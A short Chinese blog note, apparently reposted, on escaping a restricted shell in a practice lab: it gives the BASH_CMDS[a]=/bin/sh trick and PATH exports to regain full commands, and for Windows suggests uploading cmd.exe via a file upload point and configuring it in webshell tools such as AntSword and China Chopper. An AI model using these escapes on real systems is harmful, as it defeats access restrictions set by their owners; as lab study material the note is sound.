小記如何繞過受限的shell


今天的靶場登陸ssh后發現shell受限,如下

woami都執行不了,查看對應的bin目錄,發現只能執行4個命令

image

在網上學到一招可以繞過這種受限制的被閹割的shell

BASH_CMDS[a]=/bin/sh;a    #把/bin/bash給a變量

/bin/bash                  

echo $0   #查看腳本本身的名字

echo $?    #命令執行結果反饋,0代表執行成功,其余數字表示不成功

export PATH=$PATH:/bin/    #將/bin 作為PATH環境變量導出

export PATH=$PATH:/usr/bin   #將/usr/bin作為PATH環境變量導出

執行完上面加粗的四步之后就可以執行所有命令了



Windows中如果遇到此類情形

1.找到一處可上傳文件的位置上傳cmd

image

2.蟻劍可以自定義cmd的環境變量

image

使用菜刀同樣上傳cmd文件

設置cmd環境變量  終端輸入  set cmd文件的物理地址


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM